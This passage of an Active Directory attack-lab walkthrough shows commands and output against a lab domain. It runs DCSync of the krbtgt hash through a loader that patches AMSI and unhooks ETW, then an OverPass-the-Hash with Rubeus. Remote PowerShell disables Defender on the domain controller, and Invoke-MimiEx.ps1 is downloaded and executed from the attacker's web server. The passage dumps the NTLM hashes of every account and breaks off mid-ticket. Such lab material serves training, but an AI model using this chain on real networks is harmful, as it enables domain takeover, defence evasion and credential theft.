Base64(key) : U4HQ+qXe5C7Yogy7O+lk382AqHA4NVU6HnrEbtVTjrI=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new Command Prompt with the Domain Administrator privileges opens.

C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\SafetyKatz.exe"
"lsadump::dcsync /user:dcorp\krbtgt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\SafetyKatz.exe Arguments :

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\SafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\SafetyKatz.exe" command of "standard" module not
found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
 14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd

mimikatz(commandline) # exit
Bye!

Username AES Hashes

krbtgt 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848

Username NTLM Hashes

krbtgt 4e9815869d2090ccfca61c1fe0d23986

Dumping all hashes from Domain Controller

Using Invoke-Mimi
We would need Domain Administrator privileges for dumping all the hashes from the Domain Controller.
Using HFS, we host the script Invoke-MimiEx.ps1 on a Webserver from our student machine.
Now we execute an OverPass The Hash attack with the hash of the user svcadmin.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : ARGZ9EJ6
[*] Domain : PW3GFCC2
[*] Password : XEVYM8TW
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4208
[+] LUID : 0x32d375

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 3330933
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
 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
[*] Target LUID: 0x32d375
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 10:19:51 AM
EndTime : 6/27/2024 8:19:51 PM
RenewTill : 7/4/2024 10:19:51 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : jwQnLYt/C4LzMhv3t2lW7UzdnTljUO0+9dA/CyewWTQ=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new Command prompt with the Domain Administrator privileges opens. We will disable Defender and
download the script Invke-MimiEx.ps1 on to the Domain Controller.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements!

https://aka.ms/PSWindows
PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -
ScriptBlock { Set-MpPreference -DisableRealtimeMonitoring $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -
ScriptBlock { Set-MpPreference -DisableBehaviorMonitoring $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -
ScriptBlock { Set-MpPreference -DisableIntrusionPreventionSystem $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -
ScriptBlock { Set-MpPreference -DisableIOAVProtection $true }
PS C:\Windows\system32> Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> iex (iwr -UseBasicParsing
http://172.16.100.163/Invoke-MimiEx.ps1)
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"lsadump::lsa /patch"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch

Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID : 000001f4 (500)

User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID : 000001f5 (501)

User : Guest
LM :
NTLM :

RID : 000001f6 (502)

User : krbtgt
LM :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID : 00000459 (1113)

User : sqladmin
LM :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID : 0000045a (1114)

User : websvc
LM :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID : 0000045b (1115)

User : srvadmin
LM :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID : 0000045d (1117)

User : appadmin
LM :
NTLM : d549831a955fee51a43c83efb3928fa7
RID : 0000045e (1118)
User : svcadmin
LM :
NTLM : b38ff50264b74508085d82c69794a4d8

RID : 0000045f (1119)

User : testda
LM :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID : 00000460 (1120)

User : mgmtadmin
LM :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID : 00000461 (1121)

User : ciadmin
LM :
NTLM : e08253add90dccf1a208523d02998c3d

RID : 00000462 (1122)

User : sql1admin
LM :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID : 00001055 (4181)

User : studentadmin
LM :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID : 00003521 (13601)

User : student161
LM :
NTLM : 12fe951ecdce0ee2edd5a4d71a0d6e0b

RID : 00003522 (13602)

User : student162
LM :
NTLM : 2230beda3bcd55b72cc4c1a5ef8170e9

RID : 00003523 (13603)

User : student163
LM :
NTLM : ccbca8c20310dbc0c5c9dcf1fde108b8

RID : 00003524 (13604)

User : student164
LM :
NTLM : 55e3baaf40c19d73f46b601d3cbfd41b

RID : 00003525 (13605)

User : student165
LM :
NTLM : a42ea87cc59018a3b49ec5d9be31a646

RID : 00003526 (13606)

User : student166
LM :
NTLM : 24b141d31352ea4f12745579e4885756

RID : 00003527 (13607)

User : student167
LM :
NTLM : 5ea118645828dcab565bf5895ca4ea57

RID : 00003528 (13608)

User : student168
LM :
NTLM : 53171b516f11d8b38e9fb0572014ba55

RID : 00003529 (13609)

User : student169
LM :
NTLM : 5a231022659299b4a1f2d1651d1c5106

RID : 0000352a (13610)

User : student170
LM :
NTLM : 9b0a73646f1fab4f0321f4526f3ed8f1

RID : 0000352b (13611)

User : student171
LM :
NTLM : 83c26fe5a55558897267fdf9a0d91d0d

RID : 0000352c (13612)

User : student172
LM :
NTLM : 1c0175bcef53648c75a88d566d2df3da

RID : 0000352d (13613)

User : student173
LM :
NTLM : de2a9206f558dddf3ded7b5f3427182c

RID : 0000352e (13614)

User : student174
LM :
NTLM : 6c22f89d3c33d5d260f195be679212b3

RID : 0000352f (13615)

User : student175
LM :
NTLM : 2c102014852ffa9959434ac02dc0fecd

RID : 00003530 (13616)

User : student176
LM :
NTLM : a8918ce94dcd39974537493be3a4895c

RID : 00003531 (13617)

User : student177
LM :
NTLM : d348e38df9c4883b5f234d83deb038f3

RID : 00003532 (13618)

User : student178
LM :
NTLM : cc4f8e304a59ed00c47a87d42b7c107f

RID : 00003533 (13619)

User : student179
LM :
NTLM : 667598cfb79b5ca955c70afba1606ee2

RID : 00003534 (13620)

User : student180
LM :
NTLM : 2e893c9e2619ca18f0560e732c573eb9

RID : 00003535 (13621)

User : Control161user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003536 (13622)

User : Control162user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003537 (13623)

User : Control163user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003538 (13624)

User : Control164user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003539 (13625)

User : Control165user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353a (13626)

User : Control166user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353b (13627)

User : Control167user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353c (13628)

User : Control168user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353d (13629)

User : Control169user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353e (13630)

User : Control170user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353f (13631)

User : Control171user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003540 (13632)

User : Control172user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003541 (13633)

User : Control173user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003542 (13634)

User : Control174user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003543 (13635)

User : Control175user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003544 (13636)

User : Control176user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003545 (13637)

User : Control177user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003546 (13638)

User : Control178user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003547 (13639)

User : Control179user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003548 (13640)

User : Control180user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003549 (13641)

User : Support161user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000354a (13642)
User : Support162user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354b (13643)

User : Support163user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354c (13644)

User : Support164user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354d (13645)

User : Support165user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354e (13646)

User : Support166user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354f (13647)

User : Support167user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003550 (13648)

User : Support168user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003551 (13649)

User : Support169user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003552 (13650)

User : Support170user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003553 (13651)

User : Support171user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003554 (13652)

User : Support172user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003555 (13653)

User : Support173user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003556 (13654)
User : Support174user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003557 (13655)

User : Support175user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003558 (13656)

User : Support176user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003559 (13657)

User : Support177user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355a (13658)

User : Support178user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355b (13659)

User : Support179user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355c (13660)

User : Support180user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355d (13661)

User : VPN161user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355e (13662)

User : VPN162user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355f (13663)

User : VPN163user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003560 (13664)

User : VPN164user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003561 (13665)

User : VPN165user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003562 (13666)

User : VPN166user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003563 (13667)

User : VPN167user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003564 (13668)

User : VPN168user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003565 (13669)

User : VPN169user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003566 (13670)

User : VPN170user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003567 (13671)

User : VPN171user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003568 (13672)

User : VPN172user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003569 (13673)

User : VPN173user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356a (13674)

User : VPN174user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356b (13675)

User : VPN175user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356c (13676)

User : VPN176user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356d (13677)

User : VPN177user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356e (13678)

User : VPN178user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356f (13679)

User : VPN179user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003570 (13680)

User : VPN180user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 000003e8 (1000)

User : DCORP-DC$
LM :
NTLM : 81a9ccc2f44b988af78448ad78297ad5

RID : 00000451 (1105)

User : DCORP-ADMINSRV$
LM :
NTLM : b5f451985fd34d58d5120816d31b5565

RID : 00000452 (1106)

User : DCORP-APPSRV$
LM :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID : 00000453 (1107)

User : DCORP-CI$
LM :
NTLM : f76f48c176dc09cfd5765843c32809f3

RID : 00000454 (1108)

User : DCORP-MGMT$
LM :
NTLM : 0878da540f45b31b974f73312c18e754

RID : 00000455 (1109)

User : DCORP-MSSQL$
LM :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID : 00000456 (1110)

User : DCORP-SQL1$
LM :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID : 0000106a (4202)

User : DCORP-STDADMIN$
LM :
NTLM : 323e49189b1edbea4a323142017328cb

RID : 00003571 (13681)

User : DCORP-STD161$
LM :
NTLM : 9ef9daa7b4bc99ab3e4121f2abd037c7

RID : 00003572 (13682)

User : DCORP-STD162$
LM :
NTLM : 354a9b4320a227e36d82c19f92851f5b

RID : 00003573 (13683)

User : DCORP-STD163$
LM :
NTLM : 75e1e5ec9a9f15290d40cd1b04fede35

RID : 00003574 (13684)

User : DCORP-STD164$
LM :
NTLM : 9fa111e9828fcb2a53d01dcf8133cc0d

RID : 00003575 (13685)

User : DCORP-STD165$
LM :
NTLM : 565d99510bbbe8fb3e4fa5c9c2120bc5

RID : 00003576 (13686)

User : DCORP-STD166$
LM :
NTLM : 1ab7d20a96b7b4b34e0c806b7631ad8e

RID : 00003577 (13687)

User : DCORP-STD168$
LM :
NTLM : 313fc2c203e17c1a63554c88e090c205

RID : 00003578 (13688)

User : DCORP-STD167$
LM :
NTLM : 69a450cb407f22862f946f22d20db2c2

RID : 00003579 (13689)

User : DCORP-STD169$
LM :
NTLM : ceeab9f5c7798eb9034512934ec115a8

RID : 0000357a (13690)

User : DCORP-STD170$
LM :
NTLM : 1d24dfc4057c69f71576c0cc1e862a17

RID : 0000357b (13691)

User : DCORP-STD171$
LM :
NTLM : 84d9394ef97f221290f257059e8086d0

RID : 0000357c (13692)

User : DCORP-STD172$
LM :
NTLM : 49cc46d9ea5e322232497c21f808ff88
RID : 0000357d (13693)
User : DCORP-STD173$
LM :
NTLM : 323a672db50f9467fde4368c6a60c8d8

RID : 0000357e (13694)

User : DCORP-STD174$
LM :
NTLM : b642781c290b8550a2e9b2661cf87654

RID : 0000357f (13695)

User : DCORP-STD175$
LM :
NTLM : 57f3d186ece9047624b82015fab8d00e

RID : 00003580 (13696)

User : DCORP-STD176$
LM :
NTLM : 79207f3a25b685aa97ea1b34aef53fef

RID : 00003581 (13697)

User : DCORP-STD177$
LM :
NTLM : 2979ebc70dd459e65f8ac3e998aed6b1

RID : 00003582 (13698)

User : DCORP-STD178$
LM :
NTLM : 956164515f0459ea114452437d5ea4d7

RID : 00003583 (13699)

User : DCORP-STD180$
LM :
NTLM : 459c493625fe5994ff309debff15f163

RID : 00003584 (13700)

User : DCORP-STD179$
LM :
NTLM : c9b2183c974b57b61d873026a4443688

RID : 0000044f (1103)

User : mcorp$
LM :
NTLM : a8f73b279dc7257c7a8a2d0c911043d2

RID : 00000450 (1104)

User : US$
LM :
NTLM : af07f85604860fdb9abc78c922792e09

RID : 00000458 (1112)

User : ecorp$
LM :
NTLM : 6f3e00e84e8f3a79b38bfbbea011839b

Using SafetyKatz
We will host the SafetyKatz.exe on a WebServer on our Student machine using HFS.
Now we execute an OverPass The Hash attack to get a command prompt with domain administrator
privileges.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : ITEXXIF1
[*] Domain : EZK5XMJI
[*] Password : BK5IGGQ0
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3688
[+] LUID : 0xb9e0d8

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 12181720
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGAjCCBf6gAwIBBaEDAgEWooIE2TCCBNVhggTRMIIEzaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BHUwggRxoAMCARKhAwIBAqKCBGMEggRf2YKG9v4uBo2vapXpyUKO0/DVweVzF/j+uSXxU8z/U3m87h9O
gpckcdvCw8lB9/4Iy8t+zl5Tylw9FertfJJ+MwcLCq69JkkZf5i+xFXnpFvppmmUyQLJa8I/ZepqHpMy
zfyaO2s/nwB1eVwtBIlWalW7/jADnwxgd5lRqt/IrytMibzHow1xXsW77nBheKvkAgPH/7EsC6eBUxtR
dvE8j+5ZLip74ZK7n0+gBQmsZ0bLwb3A+xdhJklhua5wuAATUqx/0SdOHRuDT9zIViivYxhQRFJ8oFJd
u/jUL/wodteZa0PFUcuPuLsoNuxqIeRmfjPHfQdrI2TgMHNZ+Du3NREQmsyd5mdD8Bls7nCEtIu/dfBu
